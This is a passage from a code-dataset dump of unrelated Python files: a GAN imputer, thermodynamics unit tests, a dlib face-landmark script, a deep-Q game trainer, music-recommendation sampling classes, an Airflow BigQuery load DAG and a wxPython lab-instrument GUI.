n_labels):\r\n super(Discriminator, self).__init__()\r\n input_dim = n_labels\r\n self.main = nn.Sequential(\r\n nn.Linear(input_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, 32),\r\n nn.ReLU(),\r\n nn.Linear(32, 1),\r\n )\r\n\r\n def forward(self, input):\r\n output = self.main(input)\r\n return output\r\n\r\nclass MultipleBranchesDiscriminator(nn.Module):\r\n def __init__(self, n_labels):\r\n super(MultipleBranchesDiscriminator, self).__init__()\r\n input_dim = n_labels\r\n branches = []\r\n for i in range(1):\r\n branch = nn.Sequential(\r\n nn.Linear(input_dim, 512),\r\n nn.ReLU(),\r\n nn.Linear(512, 256),\r\n nn.ReLU(),\r\n nn.Linear(256, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, 1)\r\n )\r\n branches.append(branch)\r\n self.branches = nn.Sequential(*branches)\r\n\r\n def forward(self, input):\r\n scores = []\r\n for branch in self.branches:\r\n score = branch(input)\r\n scores.append(score)\r\n return torch.cat(scores, dim=1)\r\n\r\nclass Divide(nn.Module):\r\n def __init__(self, lambda_):\r\n super(Divide, self).__init__()\r\n self.lambda_ = lambda_\r\n def forward(self, x):\r\n return x/self.lambda_\r\n\r\nclass Generator_Imputer(nn.Module):\r\n\r\n def __init__(self, n_labels):\r\n super(Generator_Imputer, self).__init__()\r\n input_dim = n_labels\r\n # Note: without branches\r\n self.main = nn.Sequential(\r\n nn.Linear(input_dim, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, 128),\r\n 
nn.ReLU(),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, input_dim),\r\n # Note: performed better without Tanh activation\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, input, m):\r\n # Note: noise or without noise\r\n hidden = self.main(input * m)\r\n return input * m + (1 - m) * hidden\r\n\r\ndef calc_gradient_penalty(netD, real_data, fake_data, batch_size,use_cuda,lambda_):\r\n alpha = torch.rand(batch_size, 1)\r\n alpha = alpha.expand(real_data.size())\r\n alpha = alpha.cuda() if use_cuda else alpha\r\n\r\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\r\n\r\n if use_cuda:\r\n interpolates = interpolates.cuda()\r\n interpolates = Variable(interpolates, requires_grad=True)\r\n\r\n disc_interpolates = netD(interpolates)\r\n\r\n gradients = grad(outputs=disc_interpolates, inputs=interpolates,\r\n grad_outputs=torch.ones(disc_interpolates.size()).cuda() if use_cuda else torch.ones(\r\n disc_interpolates.size()),\r\n create_graph=True, retain_graph=True, only_inputs=True)[0]\r\n\r\n gradient_penalty = ((gradients.norm(2, dim=1) - 1)\r\n ** 2).mean() * lambda_\r\n return gradient_penalty\r\n\r\ndef weights_init(m):\r\n classname = m.__class__.__name__\r\n if classname.find('Conv') != -1:\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif classname.find('BatchNorm') != -1:\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)\r\n\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n\r\ndef cal_loss_MSER(imputer, data_loader):\r\n imputed_data_mask = []\r\n origin_data_mask = []\r\n loss = []\r\n for real_data, real_mask, origin_data, _ in data_loader:\r\n origin_data = origin_data.float().to(device)\r\n real_mask = real_mask.float().to(device)\r\n imputed_data = imputer(origin_data, real_mask)\r\n\r\n imputed_data = imputed_data.detach().cpu().numpy()\r\n origin_data = origin_data.detach().cpu().numpy()\r\n masks = real_mask.detach().cpu().numpy()\r\n\r\n imputed_data_mask.extend(imputed_data * (1 - masks))\r\n origin_data_mask.extend(origin_data * (1 - masks))\r\n\r\n return imputed_data_mask, origin_data_mask\r\n\r\n\r\ndef train(data,batch_size,epochs,n_iter_d,n_iter_g,beta1,beta2,lr,lambda_):\r\n # batch_size = cf.batch_size\r\n data_loader = DataLoader(data, batch_size=batch_size, shuffle=True,\r\n drop_last=True)\r\n\r\n # lambda_ = 10\r\n # lr = 5e-4\r\n # beta1 = 0.0001\r\n # beta2 = 0.999\r\n # n_iter_d = 2\r\n # n_iter_g = 1\r\n # n_iter = cf.n_iter\r\n\r\n netG_imp = Generator_Imputer(data.n_labels)\r\n netG_imp.apply(weights_init)\r\n\r\n netD_imp = Discriminator(data.n_labels)\r\n netD_imp.apply(weights_init)\r\n\r\n if use_cuda:\r\n netG_imp = netG_imp.cuda()\r\n netD_imp = netD_imp.cuda()\r\n optimizerG_imp = optim.Adam(\r\n netG_imp.parameters(), lr=lr, betas=(beta1, beta2))\r\n # Note: transfer learning with lr/10\r\n optimizerD_imp = optim.Adam(\r\n netD_imp.parameters(), lr=lr, betas=(beta1, beta2))\r\n\r\n\r\n for _ in range(epochs):\r\n # for iter in range(5):\r\n # print(iter)\r\n # data.suff()\r\n # data_loader = DataLoader(data, batch_size=batch_size, shuffle=True,\r\n # drop_last=True)\r\n for _, real_mask, real_data, _ in data_loader:\r\n for _ in range(n_iter_d):\r\n # for real_data, real_mask, origin_data, _ in data_loader:\r\n # real_data, real_mask, origin_data, _ = next(iter(data_loader))\r\n netG_imp.zero_grad()\r\n netD_imp.zero_grad()\r\n if use_cuda:\r\n real_data, real_mask = real_data.float().cuda(), real_mask.float().cuda()\r\n\r\n fake_imp = netG_imp(real_data, real_mask).detach()\r\n real_imp = 
real_data.detach()\r\n else:\r\n real_data, real_mask = real_data.float(), real_mask.float()\r\n\r\n fake_imp = netG_imp(real_data, real_mask)\r\n real_imp = real_data\r\n # train with real\r\n D_real_imp = netD_imp(real_data)\r\n D_real_imp = D_real_imp.mean()\r\n\r\n # train with fake\r\n D_fake_imp = netD_imp(fake_imp)\r\n D_fake_imp = D_fake_imp.mean()\r\n\r\n gradient_penalty = calc_gradient_penalty(\r\n netD_imp, real_imp, fake_imp, batch_size,use_cuda,lambda_)\r\n D_imp_cost = D_fake_imp - D_real_imp + gradient_penalty\r\n dist = D_real_imp - D_fake_imp\r\n D_imp_cost.backward()\r\n optimizerD_imp.step()\r\n\r\n ############################\r\n # (2) Update G_imp network\r\n ############################\r\n\r\n # for real_data, real_mask, origin_data, _ in data_loader:\r\n for _ in range(n_iter_g):\r\n # real_data, real_mask, origin_data, _ = next(iter(data_loader))\r\n\r\n netG_imp.zero_grad()\r\n netD_imp.zero_grad()\r\n\r\n if use_cuda:\r\n real_data, real_mask = real_data.float().cuda(), real_mask.float().cuda()\r\n else:\r\n real_data, real_mask = real_data.float(), real_mask.float()\r\n fake_imp = netG_imp(real_data, real_mask)\r\n\r\n G_imp_cost = netD_imp(fake_imp)\r\n # G_imp_cost = -G_imp_cost.mean()* 0.0 + 1.0 * torch.sqrt(torch.sum((real_data-fake_imp)**2))\r\n G_imp_cost = -G_imp_cost.mean()\r\n G_imp_cost.backward()\r\n optimizerG_imp.step()\r\n return netG_imp,netD_imp","sub_path":"misgan_dd/model_dd.py","file_name":"model_dd.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"190091358","text":"import unittest\nfrom numpy import max, abs, ones, zeros\nfrom spitfire.configured.options import get_configuration_option\nfrom cantera import Solution, gas_constant\nfrom spitfire.griffon.griffon import PyCombustionKernels as Griffon\nfrom os.path import join\nfrom subprocess import getoutput\n\ntest_mech_directory = join(get_configuration_option('spitfire_path'), 'test', 'griffon', 'test-mechanisms')\nmechs = [x.replace('.xml', '') for x in getoutput('ls ' + test_mech_directory + ' | grep .xml').split('\\n')]\n\ntolerance = 1.e-12\n\n\ndef do_mmw(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.mean_molecular_weight\n gr = griffon.mixture_molecular_weight(y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_density(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.density_mass\n gr = griffon.ideal_gas_density(p, T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_pressure(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n rho = gas.density_mass\n gr = griffon.ideal_gas_pressure(rho, T, y)\n return abs(gr - p) / abs(gr) < tolerance\n\n\ndef do_cpmix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.cp_mass\n gr = griffon.cp_mix(T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_cvmix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.cv_mass\n gr = griffon.cv_mix(T, y)\n return abs(gr - ct) / abs(gr) < tolerance\n\n\ndef do_cpspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_cp_R * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_cp(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_cvspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_cp_R * gas_constant / gas.molecular_weights - gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_cv(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_hmix(griffon, gas, 
T, p, y):\n gas.TPY = T, p, y\n ct = gas.enthalpy_mass\n gr = griffon.enthalpy_mix(T, y)\n return abs(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_emix(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.int_energy_mass\n gr = griffon.energy_mix(T, y)\n return abs(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_hspec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_enthalpies_RT * gas.T * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_enthalpies(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\ndef do_espec(griffon, gas, T, p, y):\n gas.TPY = T, p, y\n ct = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights\n gr = zeros(gas.n_species)\n griffon.species_energies(T, gr)\n return max(abs(gr - ct) / abs(gr)) < tolerance\n\n\nquantity_test_dict = {'mixture molecular weight': do_mmw,\n 'density': do_density,\n 'pressure': do_pressure,\n 'cp mix': do_cpmix,\n 'cv mix': do_cvmix,\n 'cp species': do_cpspec,\n 'cv species': do_cvspec,\n 'enthalpy mix': do_hmix,\n 'energy mix': do_emix,\n 'enthalpy species': do_hspec,\n 'energy species': do_espec}\n\n\ndef validate_on_mechanism(mech, temperature, quantity):\n xml = join(test_mech_directory, mech + '.xml')\n\n r = Griffon(xml, 'gas')\n gas = Solution(xml)\n\n T = temperature\n p = 101325.\n gas.TPY = T, p, ones(gas.n_species)\n y = gas.Y\n\n return quantity_test_dict[quantity](r, gas, T, p, y)\n\n\ndef create_test(m, T, quantity):\n def test(self):\n self.assertTrue(validate_on_mechanism(m, T, quantity))\n\n return test\n\n\nclass Accuracy(unittest.TestCase):\n pass\n\n\nif get_configuration_option('test_griffon') == 'True':\n temperature_dict = {'low': 300., 'high': 1200.}\n for mech in mechs:\n for quantity in quantity_test_dict.keys():\n for temperature in temperature_dict:\n testname = 'test_' + quantity.replace(' ', '-') + '_' + mech + '_' + temperature + 'T'\n setattr(Accuracy, testname, create_test(mech, temperature_dict[temperature], quantity))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/griffon/test_thermodynamics.py","file_name":"test_thermodynamics.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287109919","text":"# -*- coding: utf-8 -*-\n# @Time : 18-5-25 下午7:38\n# @Author : payneLi\n# @Email : lph0729@163.com\n# @File : dlib_getFAce.py\n\nimport cv2\nimport dlib\nfrom matplotlib import pyplot as plt\n\n# image_path = \"../OpenCv/AJ_Cook/AJ_Cook_0001.jpg\"\nimage_path = \"./payneLi.jpg\"\nlandmark_path = \"./dlib_aligin/shape_predictor_68_face_landmarks.dat\"\n\n\"\"\"加载人脸对准模型\"\"\"\nface_detector = dlib.get_frontal_face_detector() # 实例化一个特征提取器\nlandmark_predictor = dlib.shape_predictor(landmark_path) # 特征点检测器\n\n\ndef get_face():\n \"\"\"根据人脸框bbox, 从一张完整图片裁出一张人脸\"\"\"\n image_bgr = cv2.imread(image_path)\n if image_bgr is None:\n return False\n image_rgb = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)\n face_react = face_detector(image_rgb, 1) # 传递的参数不太懂\n print(\"------face_react---------\", face_react)\n if len(face_react) <= 0:\n return False\n\n for k, d in enumerate(face_react):\n shape = landmark_predictor(image_rgb, d) # 返回的结果是一个对象\n for i in range(68):\n pt = shape.part(i)\n plt.plot(pt.x, pt.y, \"ro\")\n plt.imshow(image_rgb)\n 
plt.show()\n\n\nget_face()\n","sub_path":"AI/Dlib/dlib_getFAce.py","file_name":"dlib_getFAce.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497198825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\ntrain part\n\n\"\"\"\n\n\nimport numpy as np\nfrom collections import deque\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\n#from keras.optimizers import Adam\nfrom numpy import random\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n#import tensorflow as tf\n\nfrom game_api2 import jump_API\n\nimg_rows = 100\nimg_cols = 100\nimg_channels = 1\nACTIONS = 15 # how many actions can be taken\nMIN_MS = 300 # the minimum steps (press time in old API)\nMAX_MS = 1200\nOBSERVATION = 100 # how many observations before start to train\nINITIAL_EPSILON = 0.15\nFINAL_EPSILON = 0.0001\nEXPLORE = 1000 # how many steps from INITIAL_EPSILON to FINAL_EPSILON\nREPLAY_MEMORY = 2000 # number of states to remember\nBATCH = 500 # size of minibatch\nGAMMA = 0.05 # the decay rate\nMONITOR = True # whether to show the images\nMASK = False # use the masked image to train\n\ndef buildmodel(show_model=False):\n model = Sequential()\n model.add(Conv2D(8,(5,5),activation='relu',input_shape=(img_rows,img_cols,img_channels)))\n model.add(MaxPooling2D((4,4)))\n model.add(Conv2D(16,(3,3),activation='relu'))\n model.add(MaxPooling2D((4,4)))\n model.add(Flatten())\n model.add(Dense(32))\n model.add(Dropout(0.4))\n model.add(Dense(ACTIONS))\n model.compile(loss='mse',optimizer='adam')\n if show_model: print(model.summary())\n return model\n\n\n\n\n####### if you run at the first time:\nif not os.path.exists('mem.pickle'):\n model = buildmodel(True)\n mem = deque(maxlen = REPLAY_MEMORY) # store the memories\n epsilon = INITIAL_EPSILON\n t=0\nelse:####### if you continue to run:\n with open('mem.pickle','rb') as f:\n (t,epsilon,mem)=pickle.load(f)\n from keras.models import load_model\n model = load_model('model.h5')\n##################################\n\ng = jump_API(MIN_MS,MAX_MS,ACTIONS,MASK) #initialize an API to the game\ns_t = g.first_step()\n\nwhile True: # start to loop\n print('*********************************')\n print('t=%i,epsilon=%f'%(t,epsilon),end=' ')\n if random.random()<=epsilon:\n print('RANDOM MOVE!')\n a_t = random.choice(ACTIONS)\n else:\n print('Move by model.')\n qs = model.predict(s_t)\n a_t = np.argmax(qs)\n # forward one step\n print('Moving...',end=' ')\n s_t1, r_t, die = g.next_step(a_t)\n print('Done.')\n \n # save it to memory\n print('=========')\n print('NEW Memory: \\na_t=%i,r_t=%i,die=%i'%(a_t,r_t,die))\n if die:\n mem.append((s_t,a_t, r_t,None,die))\n if MONITOR: plt.imshow(s_t[0,:,:,0],'gray')\n if MONITOR: plt.show()\n print('Then DIE.')\n else:\n mem.append((s_t,a_t, r_t,s_t1,die))\n if MONITOR: plt.imshow(np.concatenate((s_t,s_t1),axis=2)[0,:,:,0],'gray')\n if MONITOR: plt.show()\n print('=========')\n # update epsilon\n if epsilon > FINAL_EPSILON and t > OBSERVATION:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n if epsilon < FINAL_EPSILON: epsilon = FINAL_EPSILON\n # trian the model if observations are enough\n if t > OBSERVATION:\n # sample a minibatch\n minibatch = random.choice(len(mem), min(BATCH,len(mem)))\n # initialize input and target\n inputs = np.zeros((BATCH, img_rows, img_cols, img_channels))\n targets = np.zeros((BATCH, ACTIONS))\n # 
fill them\n for i,j in enumerate(minibatch):\n (s0_t,a0_t, r0_t,s0_t1,die0) = mem[j]\n inputs[i:i+1] = s0_t\n if die0:\n targets[i] = model.predict(s0_t)\n targets[i,a0_t] = r0_t # if die, no future rewards\n else:\n # if not die, other distances should be worse\n targets[i] = np.zeros((1,ACTIONS))\n Qt1 = model.predict(s0_t1)\n maxQ = np.max(Qt1)\n targets[i,a0_t] = r0_t + GAMMA * maxQ\n # train the model\n print('Training the model...',end=' ')\n loss = model.train_on_batch(inputs,targets)\n print('Done. loss=%f'%loss)\n # iteration\n s_t = s_t1\n t += 1\n # save the model every 10 times\n if t%50 ==0:\n print('saving model...',end=' ')\n model.save('model.h5')\n with open('mem.pickle','wb') as f:\n pickle.dump((t,epsilon,mem),f)\n print('Done.')\n \n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"641157735","text":"import numpy as np\r\nfrom pandas import qcut, read_csv\r\nfrom scipy import sparse\r\nfrom sklearn.metrics.pairwise import euclidean_distances\r\nfrom sklearn.preprocessing import normalize\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef calc_distance_matrix(dataset=None):\r\n music_content_feature = ['instrumentalness', 'liveness', 'speechiness', 'danceability',\r\n 'valence', 'loudness', 'tempo', 'acousticness', 'energy', 'mode']\r\n if dataset == 'nowplaying-rs':\r\n cleaned_df = read_csv('../../nowplaying-RS-Music-Reco-FM/nowplaying_cleaned.csv', index_col=0)\r\n track_contents = cleaned_df.drop_duplicates(subset=['track_id'])[music_content_feature]\r\n\r\n elif dataset == 'mmtd':\r\n songs_df = read_csv('../../mmtd/mmtd_nowplaying.csv', index_col=0)\r\n track_contents = songs_df.drop_duplicates(subset=['spotify_id'])[music_content_feature]\r\n\r\n track_contents_norm = normalize(track_contents, axis=0)\r\n return euclidean_distances(track_contents_norm)\r\n\r\n\r\nclass UserOrientedLEsSampling:\r\n def __init__(self, k, sampling_size=None):\r\n self.k = 1 if k < 1 else k\r\n self.item_size = sampling_size\r\n\r\n def generate_record(self, item_id=None):\r\n record = np.random.randint(0, self.item_size, self.k)\r\n while item_id in record:\r\n record = np.random.randint(0, self.item_size, self.k)\r\n return record\r\n\r\n\r\n# content-based cosine similarity\r\nclass WeightedUserOrientedLEsSampling(UserOrientedLEsSampling):\r\n def __init__(self, k, dataset):\r\n distance_matrix = calc_distance_matrix(dataset)\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=distance_matrix.shape[0])\r\n self.weight_mat = distance_matrix / distance_matrix.sum(axis=1).reshape(self.item_size, 1)\r\n del distance_matrix\r\n\r\n def generate_record(self, item_id=None):\r\n # weight = distance_matrix[item_id] / np.sum(distance_matrix[item_id])\r\n return np.random.choice(self.item_size, self.k, p=self.weight_mat[item_id])\r\n\r\n\r\n# Popularity\r\nclass PopularitySampling(UserOrientedLEsSampling):\r\n def __init__(self, k, track=None, score_lim=10):\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=len(track.unique()))\r\n played_count = track.value_counts(sort=False)\r\n played_ctgr = qcut(played_count, q=score_lim, labels=range(score_lim, 0, -1))\r\n self.score = played_ctgr.tolist() / np.sum(played_ctgr.tolist())\r\n\r\n def generate_record(self, item_id=None):\r\n record = np.random.randint(0, self.item_size, self.k)\r\n while item_id in record:\r\n record = np.random.choice(self.item_size, self.k, p=self.score)\r\n return 
record\r\n\r\n\r\n# context-based sampling\r\nclass ContextSampling(UserOrientedLEsSampling):\r\n def __init__(self, k, dataset=None, context_list=None, score_lim=5):\r\n UserOrientedLEsSampling.__init__(self, k=k, sampling_size=None)\r\n\r\n self.track_count_list = list()\r\n self.score_list = list()\r\n self.context_value_com = dataset[context_list].drop_duplicates().values.tolist()\r\n for context_value in tqdm(self.context_value_com):\r\n dataset_copy = dataset.copy()\r\n\r\n for l, v in zip(context_list, context_value):\r\n dataset_copy = dataset_copy[dataset_copy[l] != v]\r\n track_count = dataset_copy['track_id'].value_counts()\r\n self.track_count_list.append(track_count)\r\n self.score_list.append(track_count.tolist() / np.sum(track_count.tolist()))\r\n\r\n # track_ctgr = qcut(track_count, q=score_lim, labels=range(1, score_lim+1))\r\n # self.score_list.append(track_ctgr.tolist() / np.sum(track_ctgr.tolist()))\r\n\r\n def generate_record(self, item_id=None, context_value=None):\r\n i = self.context_value_com.index(context_value)\r\n record = np.random.choice(len(self.track_count_list[i]), self.k, p=self.score_list[i])\r\n return self.track_count_list[i].index[record][0]\r\n\r\n# cs = ContextSampling(k=1, dataset=mmtd, context_list=['lang', 'dayofyear', 'period_of_day'])\r\n# cs.generate_record()","sub_path":"negative_sampling/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638748669","text":"from __future__ import print_function\n\nimport logging\nimport os\nfrom datetime import datetime, timedelta\n\nfrom airflow import models\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\nfrom airflow.contrib.sensors.gcs_sensor import GoogleCloudStorageObjectSensor\nfrom airflow.operators.email_operator import EmailOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom google.cloud import bigquery\nfrom google.cloud.bigquery import TimePartitioning\n\nfrom ethereum2etl_airflow.bigquery_utils import submit_bigquery_job, create_dataset, read_bigquery_schema_from_file\nfrom ethereum2etl_airflow.file_utils import read_file\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\n\ndef build_load_dag(\n dag_id,\n output_bucket,\n destination_dataset_project_id,\n chain='ethereum2',\n notification_emails=None,\n load_start_date=datetime(2018, 8, 4),\n load_end_date=None,\n load_schedule_interval='0 0 * * *'\n):\n \"\"\"Build Load DAG\"\"\"\n\n dataset_name = f'crypto_{chain}'\n\n if not destination_dataset_project_id:\n raise ValueError('destination_dataset_project_id is required')\n\n default_dag_args = {\n 'depends_on_past': False,\n 'start_date': load_start_date,\n 'end_date': load_end_date,\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 5,\n 'retry_delay': timedelta(minutes=5)\n }\n\n if notification_emails and len(notification_emails) > 0:\n default_dag_args['email'] = [email.strip() for email in notification_emails.split(',')]\n\n environment = {\n 'dataset_name': dataset_name,\n 'destination_dataset_project_id': destination_dataset_project_id,\n }\n\n # Define a DAG (directed acyclic graph) of tasks.\n dag = models.DAG(\n dag_id,\n catchup=False if load_end_date is None else True,\n schedule_interval=load_schedule_interval,\n default_args=default_dag_args)\n\n dags_folder = os.environ.get('DAGS_FOLDER', '/home/airflow/gcs/dags')\n\n def add_load_tasks(task, 
time_partitioning_field='block_timestamp', only_last_date=False):\n wait_sensor = GoogleCloudStorageObjectSensor(\n task_id='wait_latest_{task}'.format(task=task),\n timeout=60 * 60,\n poke_interval=60,\n bucket=output_bucket,\n object='export/{task}/block_date={datestamp}/{task}.json'.format(task=task, datestamp='{{ds}}'),\n dag=dag\n )\n\n def load_task(ds, **kwargs):\n client = bigquery.Client()\n job_config = bigquery.LoadJobConfig()\n schema_path = os.path.join(dags_folder, 'ethereum2etl_resources/stages/load/schemas/{task}.json'.format(task=task))\n job_config.schema = read_bigquery_schema_from_file(schema_path)\n job_config.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n job_config.write_disposition = 'WRITE_TRUNCATE'\n job_config.ignore_unknown_values = True\n if time_partitioning_field is not None:\n job_config.time_partitioning = TimePartitioning(field=time_partitioning_field)\n\n export_location_uri = 'gs://{bucket}/export'.format(bucket=output_bucket)\n if only_last_date:\n uri = '{export_location_uri}/{task}/block_date={ds}/*.json'.format(\n export_location_uri=export_location_uri, task=task, ds=ds)\n else:\n uri = '{export_location_uri}/{task}/*.json'.format(export_location_uri=export_location_uri, task=task)\n table_ref = create_dataset(client, dataset_name, destination_dataset_project_id).table(task)\n load_job = client.load_table_from_uri(uri, table_ref, job_config=job_config)\n submit_bigquery_job(load_job, job_config)\n assert load_job.state == 'DONE'\n\n load_operator = PythonOperator(\n task_id='load_{task}'.format(task=task),\n python_callable=load_task,\n provide_context=True,\n execution_timeout=timedelta(minutes=30),\n dag=dag\n )\n\n wait_sensor >> load_operator\n return load_operator\n\n def add_verify_tasks(task, dependencies=None):\n # The queries in verify/sqls will fail when the condition is not met\n # Have to use this trick since the Python 2 version of BigQueryCheckOperator doesn't support standard SQL\n # and legacy SQL can't be used to query partitioned tables.\n sql_path = os.path.join(dags_folder, 'ethereum2etl_resources/stages/verify/sqls/{task}.sql'.format(task=task))\n sql = read_file(sql_path)\n verify_task = BigQueryOperator(\n task_id='verify_{task}'.format(task=task),\n bql=sql,\n params=environment,\n use_legacy_sql=False,\n dag=dag)\n if dependencies is not None and len(dependencies) > 0:\n for dependency in dependencies:\n dependency >> verify_task\n return verify_task\n\n load_beacon_blocks_task = add_load_tasks('beacon_blocks', time_partitioning_field='block_timestamp')\n load_beacon_validators_task = add_load_tasks('beacon_validators', time_partitioning_field=None, only_last_date=True)\n load_beacon_committees_task = add_load_tasks('beacon_committees', time_partitioning_field='epoch_timestamp')\n\n verify_blocks_count_task = add_verify_tasks('blocks_count', dependencies=[load_beacon_blocks_task])\n verify_blocks_have_latest_task = add_verify_tasks('blocks_have_latest', dependencies=[load_beacon_blocks_task])\n verify_committees_count_task = add_verify_tasks('committees_count', dependencies=[load_beacon_committees_task])\n\n if notification_emails and len(notification_emails) > 0:\n send_email_task = EmailOperator(\n task_id='send_email',\n to=[email.strip() for email in notification_emails.split(',')],\n subject='Ethereum2 ETL Airflow Load DAG Succeeded',\n html_content='Ethereum2 ETL Airflow Load DAG Succeeded - {}'.format(chain),\n dag=dag\n )\n verify_blocks_count_task >> send_email_task\n verify_blocks_have_latest_task 
>> send_email_task\n verify_committees_count_task >> send_email_task\n\n return dag\n","sub_path":"dags/ethereum2etl_airflow/build_load_dag.py","file_name":"build_load_dag.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"533663431","text":"########################################################################\n#\n#\tWrapper for ODD discrimination algorithm build on DEAP library (http://deap.readthedocs.org/en/latest/api/algo.html)\n#\n########################################################################\n# Add main directory to enable imports \nif __name__ == '__main__' :\n\timport os\n\tos.sys.path.append(os.path.abspath('../..'))\n########################################################################\n\nimport wx\n\n# Real time plotting\nimport visvis\n\n# GUI components\nfrom libs.gui.basic_window import BasicWindow\n\nfrom ga_tab import GA_Tab\n\n# Hardware\nfrom libs.dev.spectrometer_ocean_optics import ManagerOceanOpticsSpectrometer as ManagerSpectrometer\nfrom libs.dev.spectrometer_ocean_optics import OceanOpticsSpectrometerTab as SpectrometerTab\n#from libs.dev.camera_istar import ManagerIStarCamera as ManagerSpectrometer\n#from libs.dev.camera_istar import IStarCameraTab as SpectrometerTab\n\nfrom libs.dev.pulse_shaper import ManagerShaper, PulseShaperTab\n\n########################################################################\n\nclass SettingsNotebook (wx.Notebook) :\n\t\"\"\"\n\tGUI for listing all settings\n\t\"\"\"\n\tdef __init__(self, parent, DevSpectrometer, DevPulseShaper ):\n\t\t\"\"\"\n\t\t`DevSpectrometer` is a spectrometer manager\n\t\t\"\"\"\n\t\twx.Notebook.__init__(self, parent)\n\t\t\n\t\tself.ODD_GA = GA_Tab(self)\n\t\tself.AddPage(self.ODD_GA, \"ODD GA\")\n\t\t\n\t\tself.Spectrometer = SpectrometerTab(self, DevSpectrometer)\n\t\tself.AddPage (self.Spectrometer, \"Spectrometer\")\n\t\t \n\t\tself.PulseShaper = PulseShaperTab(self, DevPulseShaper)\n\t\tself.AddPage (self.PulseShaper, \"Pulse shaper\")\n\n\t\t# Dictionary to bind names to tabs for saving and loading settings\n\t\tself.settings_to_tabs = {\"Spectrometer\" : self.Spectrometer, \n\t\t\t\"PulseShaper\" : self.PulseShaper, \"ODD_GA\" : self.ODD_GA }\t\t\n\n########################################################################\n\nclass ODDExperiment (BasicWindow) :\n\n\tdef __init__ (self, parent) :\n\t\t# Starting spectrometer\n\t\tself.Spectrometer = ManagerSpectrometer()\n\t\tself.SpectrometerProc = self.Spectrometer.start()\n\t\t\n\t\t# Starting pulse shaper\n\t\tself.PulseShaper = ManagerShaper()\n\t\tself.PulseShaperProc = self.PulseShaper.start()\n\t\t\n\t\t# Create GUI\n\t\tdw, dh = wx.DisplaySize()\n\t\twx.Frame.__init__ (self, parent, title=\"ODD for multiple fluoresce marker concentration measurements\",\n\t\t\t\t\t\t\t\tsize=(0.9*dw, 0.88*dh) )\n\t\t\n\t\tself.ConstructGUI ()\n\t\tself.Center()\n\t\tself.Maximize()\n\t\tself.Show ()\n\t\twx.EVT_CLOSE (self, self.on_close)\n\t\t\n\tdef __del__ (self) :\t\n\t\t# Close spectrometer\n\t\tself.Spectrometer.exit(); self.SpectrometerProc.join() \n\t\t\n\t\t# Close pulse shaper\n\t\tself.PulseShaper.exit(); self.PulseShaperProc.join()\n\t\n\tdef ConstructGUI (self) :\n\t\t\"\"\" Build GUI \"\"\"\n\t\tself.panel = wx.Panel(self)\n\t\tsizer = wx.GridBagSizer ()\n\t\t\n\t\t############################ Settings Notebook ############################\n\t\tself.SettingsNotebook = SettingsNotebook(self.panel, self.Spectrometer, 
